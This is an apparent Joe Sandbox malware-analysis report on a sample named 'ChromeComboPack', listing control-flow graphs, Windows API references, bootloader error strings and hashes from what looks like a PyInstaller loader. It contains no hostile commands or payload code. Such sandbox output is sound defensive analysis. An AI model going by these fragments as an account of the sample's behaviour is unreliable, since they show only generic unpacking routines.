                                                                                                                                                                                                                                                control_flow_graph 359 7ff78c9b1930-7ff78c9b196b call 7ff78c9b39e0 362 7ff78c9b1971-7ff78c9b19b1 call 7ff78c9b73e0 359->362 363 7ff78c9b1c2e-7ff78c9b1c52 call 7ff78c9bbab0 359->363 368 7ff78c9b19b7-7ff78c9b19c7 call 7ff78c9bfbcc 362->368 369 7ff78c9b1c1b-7ff78c9b1c1e call 7ff78c9bf544 362->369 374 7ff78c9b19c9-7ff78c9b19e3 call 7ff78c9c5de8 call 7ff78c9b2020 368->374 375 7ff78c9b19e8-7ff78c9b1a04 call 7ff78c9bf894 368->375 373 7ff78c9b1c23-7ff78c9b1c2b 369->373 373->363 374->369 381 7ff78c9b1a25-7ff78c9b1a3a call 7ff78c9c5e08 375->381 382 7ff78c9b1a06-7ff78c9b1a20 call 7ff78c9c5de8 call 7ff78c9b2020 375->382 388 7ff78c9b1a5b-7ff78c9b1ae5 call 7ff78c9b1c60 * 2 call 7ff78c9bfbcc call 7ff78c9c5e24 381->388 389 7ff78c9b1a3c-7ff78c9b1a56 call 7ff78c9c5de8 call 7ff78c9b2020 381->389 382->369 403 7ff78c9b1aea-7ff78c9b1af4 388->403 389->369 404 7ff78c9b1b15-7ff78c9b1b2e call 7ff78c9bf894 403->404 405 7ff78c9b1af6-7ff78c9b1b10 call 7ff78c9c5de8 call 7ff78c9b2020 403->405 411 7ff78c9b1b4f-7ff78c9b1b6b call 7ff78c9bf608 404->411 412 7ff78c9b1b30-7ff78c9b1b4a call 7ff78c9c5de8 call 7ff78c9b2020 404->412 405->369 418 7ff78c9b1b6d-7ff78c9b1b79 call 7ff78c9b1e50 411->418 419 7ff78c9b1b7e-7ff78c9b1b8c 411->419 412->369 418->369 419->369 422 7ff78c9b1b92-7ff78c9b1b99 419->422 425 7ff78c9b1ba1-7ff78c9b1ba7 422->425 426 7ff78c9b1bc0-7ff78c9b1bcf 425->426 427 7ff78c9b1ba9-7ff78c9b1bb6 425->427 426->426 428 7ff78c9b1bd1-7ff78c9b1bda 426->428 427->428 429 7ff78c9b1bef 428->429 430 7ff78c9b1bdc-7ff78c9b1bdf 428->430 431 7ff78c9b1bf1-7ff78c9b1c04 429->431 430->429 432 7ff78c9b1be1-7ff78c9b1be4 430->432 433 7ff78c9b1c06 431->433 434 7ff78c9b1c0d-7ff78c9b1c19 431->434 432->429 435 7ff78c9b1be6-7ff78c9b1be9 432->435 433->434 434->369 434->425 435->429 436 7ff78c9b1beb-7ff78c9b1bed 435->436 436->431
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF78C9B73E0: _fread_nolock.LIBCMT ref: 00007FF78C9B748A
                                                                                                                                                                                                                                                • _fread_nolock.LIBCMT ref: 00007FF78C9B19FB
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF78C9B2020: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF78C9B1B4A), ref: 00007FF78C9B2070
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                                • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                                • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                                • Opcode ID: 50f30d5cb0672c48cb166024bc125d83fc3a391891e84defd7226bc1e4b57a21
                                                                                                                                                                                                                                                • Instruction ID: d4c2199491cf1a313c4f1ca9f43fd7a96664a441251aea8898f823c64b211a80
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 50f30d5cb0672c48cb166024bc125d83fc3a391891e84defd7226bc1e4b57a21
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B881B532A0D6D295EB50FB14D0442F9A3A1FF44784FE080B6EA8D57799EE3CE585CB60

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 437 7ff78c9b15e0-7ff78c9b15f1 438 7ff78c9b15f3-7ff78c9b15fc call 7ff78c9b1030 437->438 439 7ff78c9b1617-7ff78c9b1631 call 7ff78c9b39e0 437->439 446 7ff78c9b160e-7ff78c9b1616 438->446 447 7ff78c9b15fe-7ff78c9b1609 call 7ff78c9b1e50 438->447 444 7ff78c9b1662-7ff78c9b167c call 7ff78c9b39e0 439->444 445 7ff78c9b1633-7ff78c9b1661 call 7ff78c9c5de8 call 7ff78c9b2020 439->445 454 7ff78c9b1698-7ff78c9b16af call 7ff78c9bfbcc 444->454 455 7ff78c9b167e-7ff78c9b1693 call 7ff78c9b1e50 444->455 447->446 462 7ff78c9b16b1-7ff78c9b16d4 call 7ff78c9c5de8 call 7ff78c9b2020 454->462 463 7ff78c9b16d9-7ff78c9b16dd 454->463 461 7ff78c9b1801-7ff78c9b1804 call 7ff78c9bf544 455->461 468 7ff78c9b1809-7ff78c9b181b 461->468 476 7ff78c9b17f9-7ff78c9b17fc call 7ff78c9bf544 462->476 465 7ff78c9b16df-7ff78c9b16eb call 7ff78c9b11f0 463->465 466 7ff78c9b16f7-7ff78c9b1717 call 7ff78c9c5e24 463->466 473 7ff78c9b16f0-7ff78c9b16f2 465->473 477 7ff78c9b1741-7ff78c9b174c 466->477 478 7ff78c9b1719-7ff78c9b173c call 7ff78c9c5de8 call 7ff78c9b2020 466->478 473->476 476->461 480 7ff78c9b17e2-7ff78c9b17ea call 7ff78c9c5e10 477->480 481 7ff78c9b1752-7ff78c9b1757 477->481 491 7ff78c9b17ef-7ff78c9b17f4 478->491 480->491 484 7ff78c9b1760-7ff78c9b1782 call 7ff78c9bf894 481->484 492 7ff78c9b1784-7ff78c9b179c call 7ff78c9bffd4 484->492 493 7ff78c9b17ba-7ff78c9b17c6 call 7ff78c9c5de8 484->493 491->476 499 7ff78c9b17a5-7ff78c9b17b8 call 7ff78c9c5de8 492->499 500 7ff78c9b179e-7ff78c9b17a1 492->500 498 7ff78c9b17cd-7ff78c9b17d8 call 7ff78c9b2020 493->498 506 7ff78c9b17dd 498->506 499->498 500->484 502 7ff78c9b17a3 500->502 502->506 506->480
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                                • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                                • Opcode ID: 0e2cfcc7a6aee43edb8285f749798efa17a27fa4daa95ed02e31ec47762db7a4
                                                                                                                                                                                                                                                • Instruction ID: 7e230c04f023729fabb6b82de00946d3ffc2aba7e307c785bb7b65305d9f582e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e2cfcc7a6aee43edb8285f749798efa17a27fa4daa95ed02e31ec47762db7a4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C451A062B086D3A2EA10BB1194541B9A394BF44B94FE441B2EE0C1779AEF3CF545C720

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(FFFFFFFF,00000000,?,00007FF78C9B3101), ref: 00007FF78C9B7B54
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00007FF78C9B3101), ref: 00007FF78C9B7B5A
                                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00007FF78C9B3101), ref: 00007FF78C9B7B9C
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF78C9B7C80: GetEnvironmentVariableW.KERNEL32(00007FF78C9B2C4F), ref: 00007FF78C9B7CB7
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF78C9B7C80: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF78C9B7CD9
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF78C9C9114: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78C9C912D
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Environment$CreateCurrentDirectoryExpandPathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                                • API String ID: 365913792-1339014028
                                                                                                                                                                                                                                                • Opcode ID: f3273f3d93b4370bc37173b7eaaf61b6c15f57638ffcf23e2354b18da0bd52c9
                                                                                                                                                                                                                                                • Instruction ID: 0d36fe13f940f5d6e2064571033393c08efa248b7a8c35e7f349db9fcc9ac4f3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f3273f3d93b4370bc37173b7eaaf61b6c15f57638ffcf23e2354b18da0bd52c9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B41A321A1D6E2A1FA10FB61985A2F99291BF48B90FE141B1EE0D47796EE3CE501C730

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 784 7ff78c9b11f0-7ff78c9b124d call 7ff78c9bb2e0 787 7ff78c9b124f-7ff78c9b1276 call 7ff78c9b1e50 784->787 788 7ff78c9b1277-7ff78c9b128f call 7ff78c9c5e24 784->788 793 7ff78c9b1291-7ff78c9b12af call 7ff78c9c5de8 call 7ff78c9b2020 788->793 794 7ff78c9b12b4-7ff78c9b12c4 call 7ff78c9c5e24 788->794 807 7ff78c9b1419-7ff78c9b142e call 7ff78c9bafc0 call 7ff78c9c5e10 * 2 793->807 799 7ff78c9b12c6-7ff78c9b12e4 call 7ff78c9c5de8 call 7ff78c9b2020 794->799 800 7ff78c9b12e9-7ff78c9b12fb 794->800 799->807 803 7ff78c9b1300-7ff78c9b1325 call 7ff78c9bf894 800->803 813 7ff78c9b1411 803->813 814 7ff78c9b132b-7ff78c9b1335 call 7ff78c9bf608 803->814 821 7ff78c9b1433-7ff78c9b144d 807->821 813->807 814->813 820 7ff78c9b133b-7ff78c9b1347 814->820 822 7ff78c9b1350-7ff78c9b1378 call 7ff78c9b9720 820->822 825 7ff78c9b13f6-7ff78c9b140c call 7ff78c9b1e50 822->825 826 7ff78c9b137a-7ff78c9b137d 822->826 825->813 827 7ff78c9b13f1 826->827 828 7ff78c9b137f-7ff78c9b1389 826->828 827->825 830 7ff78c9b13b4-7ff78c9b13b7 828->830 831 7ff78c9b138b-7ff78c9b1399 call 7ff78c9bffd4 828->831 833 7ff78c9b13b9-7ff78c9b13c7 call 7ff78c9db040 830->833 834 7ff78c9b13ca-7ff78c9b13cf 830->834 835 7ff78c9b139e-7ff78c9b13a1 831->835 833->834 834->822 837 7ff78c9b13d5-7ff78c9b13d8 834->837 840 7ff78c9b13af-7ff78c9b13b2 835->840 841 7ff78c9b13a3-7ff78c9b13ad call 7ff78c9bf608 835->841 838 7ff78c9b13da-7ff78c9b13dd 837->838 839 7ff78c9b13ec-7ff78c9b13ef 837->839 838->825 843 7ff78c9b13df-7ff78c9b13e7 838->843 839->813 840->825 841->834 841->840 843->803
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                                • Opcode ID: 7577aae98bc87ab0860f0ce191cb3fb1425e5d97673a71ecab8a0878ee8126b3
                                                                                                                                                                                                                                                • Instruction ID: 981f491b3d6d67ad6bbcfb82ae5a93a8139ba15041fffd780563f5dc891b5267
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7577aae98bc87ab0860f0ce191cb3fb1425e5d97673a71ecab8a0878ee8126b3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC51E522A0C6D2A1EA60BB11A4403BAE691FF85B94FE44175EE4D47BD9FF3CE445C720

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF78C9D02B6,?,?,-00000018,00007FF78C9CBBFB,?,?,?,00007FF78C9CBAF2,?,?,?,00007FF78C9C6E9E), ref: 00007FF78C9D0098
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF78C9D02B6,?,?,-00000018,00007FF78C9CBBFB,?,?,?,00007FF78C9CBAF2,?,?,?,00007FF78C9C6E9E), ref: 00007FF78C9D00A4
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                • Opcode ID: aadbaee7c76e5d54b6d4897acaf79a0667e5faa90471c45c14db321705774b03
                                                                                                                                                                                                                                                • Instruction ID: 614c187f60fb9408c5cf2d31f958b3222e9684ce18cc043a4a29c46ad9880c68
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aadbaee7c76e5d54b6d4897acaf79a0667e5faa90471c45c14db321705774b03
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB415822B196C2D1FA15EB12F80C275A385BF45BA0FA851B5CE0DA7348EE3DE445C324

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,00007FF78C9B2BC5), ref: 00007FF78C9B2AA1
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF78C9B2BC5), ref: 00007FF78C9B2AAB
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF78C9B2310: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF78C9B2AC6,?,00007FF78C9B2BC5), ref: 00007FF78C9B2360
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF78C9B2310: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF78C9B2AC6,?,00007FF78C9B2BC5), ref: 00007FF78C9B241A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentErrorFileFormatLastMessageModuleNameProcess
                                                                                                                                                                                                                                                • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                                • API String ID: 4002088556-2863816727
                                                                                                                                                                                                                                                • Opcode ID: aed140f8d8e2637361ba54921802919f4f3b7eb641456186ceb893f60fbbd120
                                                                                                                                                                                                                                                • Instruction ID: 7ad904c56eb3696c43f39603320a7594a73156cb88d561acaca0a969e1d09ddd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aed140f8d8e2637361ba54921802919f4f3b7eb641456186ceb893f60fbbd120
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9921DB61B1CAD3A1FA31BB24E8483B6E350FF48744FE001B2E65D865D9EE2CE104C324

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 929 7ff78c9cc8fc-7ff78c9cc922 930 7ff78c9cc924-7ff78c9cc938 call 7ff78c9c5dc8 call 7ff78c9c5de8 929->930 931 7ff78c9cc93d-7ff78c9cc941 929->931 947 7ff78c9ccd2e 930->947 933 7ff78c9ccd17-7ff78c9ccd23 call 7ff78c9c5dc8 call 7ff78c9c5de8 931->933 934 7ff78c9cc947-7ff78c9cc94e 931->934 950 7ff78c9ccd29 call 7ff78c9cb7c4 933->950 934->933 936 7ff78c9cc954-7ff78c9cc982 934->936 936->933 939 7ff78c9cc988-7ff78c9cc98f 936->939 942 7ff78c9cc991-7ff78c9cc9a3 call 7ff78c9c5dc8 call 7ff78c9c5de8 939->942 943 7ff78c9cc9a8-7ff78c9cc9ab 939->943 942->950 945 7ff78c9ccd13-7ff78c9ccd15 943->945 946 7ff78c9cc9b1-7ff78c9cc9b7 943->946 951 7ff78c9ccd31-7ff78c9ccd48 945->951 946->945 952 7ff78c9cc9bd-7ff78c9cc9c0 946->952 947->951 950->947 952->942 956 7ff78c9cc9c2-7ff78c9cc9e7 952->956 958 7ff78c9cc9e9-7ff78c9cc9eb 956->958 959 7ff78c9cca1a-7ff78c9cca21 956->959 962 7ff78c9cca12-7ff78c9cca18 958->962 963 7ff78c9cc9ed-7ff78c9cc9f4 958->963 960 7ff78c9cca23-7ff78c9cca4b call 7ff78c9ce664 call 7ff78c9cb404 * 2 959->960 961 7ff78c9cc9f6-7ff78c9cca0d call 7ff78c9c5dc8 call 7ff78c9c5de8 call 7ff78c9cb7c4 959->961 990 7ff78c9cca4d-7ff78c9cca63 call 7ff78c9c5de8 call 7ff78c9c5dc8 960->990 991 7ff78c9cca68-7ff78c9cca93 call 7ff78c9cd124 960->991 995 7ff78c9ccba0 961->995 964 7ff78c9cca98-7ff78c9ccaaf 962->964 963->961 963->962 967 7ff78c9ccab1-7ff78c9ccab9 964->967 968 7ff78c9ccb2a-7ff78c9ccb34 call 7ff78c9d4b2c 964->968 967->968 971 7ff78c9ccabb-7ff78c9ccabd 967->971 981 7ff78c9ccbbe 968->981 982 7ff78c9ccb3a-7ff78c9ccb4f 968->982 971->968 975 7ff78c9ccabf-7ff78c9ccad5 971->975 975->968 979 7ff78c9ccad7-7ff78c9ccae3 975->979 979->968 984 7ff78c9ccae5-7ff78c9ccae7 979->984 986 7ff78c9ccbc3-7ff78c9ccbe3 ReadFile 981->986 982->981 987 7ff78c9ccb51-7ff78c9ccb63 GetConsoleMode 982->987 984->968 989 7ff78c9ccae9-7ff78c9ccb01 984->989 992 7ff78c9cccdd-7ff78c9ccce6 GetLastError 986->992 993 7ff78c9ccbe9-7ff78c9ccbf1 986->993 987->981 994 7ff78c9ccb65-7ff78c9ccb6d 987->994 989->968 1000 7ff78c9ccb03-7ff78c9ccb0f 989->1000 990->995 991->964 997 7ff78c9ccd03-7ff78c9ccd06 992->997 998 7ff78c9ccce8-7ff78c9cccfe call 7ff78c9c5de8 call 7ff78c9c5dc8 992->998 993->992 1002 7ff78c9ccbf7 993->1002 994->986 996 7ff78c9ccb6f-7ff78c9ccb91 ReadConsoleW 994->996 999 7ff78c9ccba3-7ff78c9ccbad call 7ff78c9cb404 995->999 1004 7ff78c9ccb93 GetLastError 996->1004 1005 7ff78c9ccbb2-7ff78c9ccbbc 996->1005 1009 7ff78c9ccd0c-7ff78c9ccd0e 997->1009 1010 7ff78c9ccb99-7ff78c9ccb9b call 7ff78c9c5d5c 997->1010 998->995 999->951 1000->968 1008 7ff78c9ccb11-7ff78c9ccb13 1000->1008 1012 7ff78c9ccbfe-7ff78c9ccc13 1002->1012 1004->1010 1005->1012 1008->968 1017 7ff78c9ccb15-7ff78c9ccb25 1008->1017 1009->999 1010->995 1012->999 1019 7ff78c9ccc15-7ff78c9ccc20 1012->1019 1017->968 1022 7ff78c9ccc22-7ff78c9ccc3b call 7ff78c9cc514 1019->1022 1023 7ff78c9ccc47-7ff78c9ccc4f 1019->1023 1029 7ff78c9ccc40-7ff78c9ccc42 1022->1029 1025 7ff78c9ccc51-7ff78c9ccc63 1023->1025 1026 7ff78c9ccccb-7ff78c9cccd8 call 7ff78c9cc354 1023->1026 1030 7ff78c9ccc65 1025->1030 1031 7ff78c9cccbe-7ff78c9cccc6 1025->1031 1026->1029 1029->999 1033 7ff78c9ccc6a-7ff78c9ccc71 1030->1033 1031->999 1034 7ff78c9ccc73-7ff78c9ccc77 1033->1034 1035 7ff78c9cccad-7ff78c9cccb8 1033->1035 1036 7ff78c9ccc93 1034->1036 1037 7ff78c9ccc79-7ff78c9ccc80 1034->1037 1035->1031 1039 7ff78c9ccc99-7ff78c9ccca9 1036->1039 1037->1036 1038 7ff78c9ccc82-7ff78c9ccc86 1037->1038 1038->1036 1040 7ff78c9ccc88-7ff78c9ccc91 1038->1040 1039->1033 1041 7ff78c9cccab 1039->1041 1040->1039 1041->1031
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: b84f99598af9228c6ddbc1f90d02b3ffc499ddb0e7ad6440c3b0aa44b94abea4
                                                                                                                                                                                                                                                • Instruction ID: bad7bb03088e2f8f4fba45ba5ab384b3dc31a92038a62d4e7c602729b315a0e4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b84f99598af9228c6ddbc1f90d02b3ffc499ddb0e7ad6440c3b0aa44b94abea4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82C1C322A0C7C681E760AB55A4442BDBF64FF91BA0FF541B1EA4E03791DE7CE845CB20

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
